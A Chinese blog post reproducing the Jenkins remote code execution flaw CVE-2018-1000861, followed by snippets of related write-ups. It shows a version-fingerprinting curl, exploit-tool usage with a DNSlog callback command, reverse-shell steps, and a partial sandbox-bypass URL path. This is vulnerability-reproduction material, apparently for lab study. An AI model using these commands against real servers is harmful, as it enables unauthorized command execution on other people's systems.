Jenkins远程命令执行漏洞(CVE-2018-1000861)

最新推荐文章于 2025-06-10 20:08:21 发布
最新推荐文章于 2025-06-10 20:08:21 发布
阅读量3.2k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: Jenkins 命令执行 漏洞复现 网络安全
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/106307189
本文提供了一步一步的指导,展示如何复现 Jenkins 中的一个远程代码执行(RCE)漏洞,包括确认目标版本、利用特定工具进行攻击、验证DNSlog响应以及获取shell的详细过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞复现

1、查看目标版本。
curl -s -I http://xxx:8080| grep X-Jenkins
在这里插入图片描述
2、利用工具。
https://github.com/orangetw/awesome-jenkins-rce-2019
usage:
python2.7m exp.py http://target.com ‘curl b2x6ay.dnslog.cn’
在这里插入图片描述3、成功接收dnslog。
在这里插入图片描述4、反弹shell。
在这里插入图片描述
getshell:
在这里插入图片描述

Jenkins远程命令执行漏洞CVE-2018-1000861复现
墨痕诉清风的博客
11-06 2380
其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。(1) 下载vulhub项目,然后进入到 vulhub/jenkins/CVE-2018-1000861目录下。(3).然后在我们接收shell的机器上监听之前写的端口。...
jenkins漏洞复现CVE-2017-1000353远程代码执行漏洞+CVE-2018-1000861未授权弱口令用户可执行任意命令
serendipity1130的博客
08-31 1052
CVE-2017-1000353 1.扫描开放了8080端口,访问8080端口: 2、执行下面命令,生成字节码文件: java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success" 3、执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串,#"touch..."是待执行的任意命令 4、修改exploit.py,把proxies里面的内容注释掉 6、执行如下
Jenkins远程命令执行漏洞(CVE-2018-1000861)
玄道的网安博客
06-06 5716
1. 漏洞简介 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令 2. 影响组件 Jenkins 3. 漏洞指纹 Jenkins 4. Fofa Dork app="Jenkins" 5. 漏洞分析 这里我们是用docker快速搭建 git clone https://github.com/vulhub/vulhub.git cd /root/vulhub/jenkins/CVE-2018-1000861 docker-compose
CVE-2024-23897源码分析与漏洞复现(Jenkins 任意文件读取)
最新发布
spinage的博客
06-10 1546
Jenkins CLI 使用 `args4j` 库解析命令参数时,默认启用 **`@` 文件路径扩展功能**(`expandAtFiles`),攻击者可利用该特性读取服务器任意文件(如 `/etc/passwd`、加密密钥等),结合其他漏洞链可能导致 **远程代码执行(RCE)**。
漏洞复现----6、Jenkins远程命令执行漏洞CVE-2018-1000861
七天
11-25 4628
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
JenkinsCVE-2018-1000861学习
公众号shadow sock7
05-22 1936
参考: https://www.lucifaer.com/2019/03/04/Jenkins RCE分析(CVE-2018-1000861分析)/ https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ // 这句将req中的字符串转换成Jenkins自己规范的路由 // 比如这里将/je...
jenkins rec 分析 cve-2018-1000861 分析
whatday的专栏
06-02 1202
0x01 Jenkins的动态路由解析 web.xml: 可以看到Jenkins将所有的请求交给org.kohsuke.stapler.Stapler来处理的,跟进看一下这个类中的service方法: 可以看到这里会根据url来调用不同的webApp,如果url以/$stapler/bound/开头,则根节点对象为org.kohsuke.stapler.bind.BoundObjectTable,否则为hudson.model.Hudson(继承jenkins.model.Jenkins
漏洞复现Jenkins远程命令执行漏洞CVE-2018-1000861
weixin_43486390的博客
12-21 3107
0x01 漏洞介绍 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 0x02 影响版本
漏洞复现Jenkins反序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_45556536的博客
11-17 880
Jenkins反序列化漏洞利用CVE-2017-1000353基础知识漏洞原理影响版本复现思路复现CVE-2018-10008611、特征检测 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。   形成漏洞的根源在于类ObjectInputStream在反序列
Jenkins远程命令执行-CVE-2018-1000861
Xor0ne
08-01 789
1、漏洞环境 环境名称: jenkins-cve_2018_1000861 攻击机:kali 2、漏洞复现 2.1、方法一 我们直接在浏然器中输入: http://192.168.20.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript ?sandbox=true&value=publi
jekins CVE-2018-1000861 漏洞复现
XXokok的博客
11-28 955
描述: Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令
Jenkins 2.7.3 LTS 发布
weixin_33845477的博客
09-03 111
更新如下: Stop A/B testing of the remoting JNLP3 protocol due to the known issues. The protocol can be enabled manually via thejenkins.slaves.JnlpSlaveAgentProtocol3.enabledsystem property. (issue 3...
jenkins未授权访问漏洞总结
qq_45746681的博客
10-05 698
jenkins未授权访问漏洞复现 0x00 漏洞描述 未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。 0x01 漏洞环境搭建(win10) 官方下载jenkins-1.620.zip,下载地址:http://mirrors.jenkins.io 运行setup.exe,安装即可,安装成功后在任务管理器中运行jenkins服务 之后访问http://localhost:8080即可 0x0
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 728
Jenkins远程命令执行漏洞CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是
Jenkins漏洞利用复现
weixin_30564901的博客
09-26 835
一、未授权访问 访问url: http://172.16.20.134:8080/script 命令执行 println "ls -al".execute().text 也可以利用powershell 或者python脚本反弹shell 二、CVE-2018-1000861远程命令执行漏洞 payload...
() Jenkins从0-1搭建--基于pipeline构建发布进阶项目(分支列表,回滚项目)
pleasures
04-08 400
DisFlag: 点击Flag处的分支会在此处显示具体分支名,可以复制该分支名到上面发布分支用于发布项目。回滚版本号为左侧发布历史的数字,如下的290,输入版本号发布就可以回滚到制定的版本号。jenkins项目默认路径: /var/lib/jenkins/workspace。Flag: 获取项目的所有分支,右侧Filter查询自己想要的分支。${WORKSPACE}: jenkins项目默认路径。${BUILD_NUMBER}: 发布的版本号。按照图示填写内容即可。
jenkins 远程代码执行 (CVE-2019-100300
04-02
CVE-2019-1003000 是 Jenkins 中因 Script Security 插件沙盒绕过导致的远程代码执行漏洞。攻击者可构造恶意请求绕过 Groovy 沙盒保护,在未授权或低权限情况下执行任意代码[^1]。此漏洞实际包含三个关联 CVE- **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值